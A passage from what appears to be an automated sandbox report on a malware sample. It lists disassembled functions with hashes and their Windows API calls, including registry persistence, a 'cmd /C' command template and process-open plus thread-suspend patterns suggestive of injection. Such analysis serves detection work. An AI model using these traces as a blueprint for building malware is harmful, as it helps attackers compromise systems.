    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
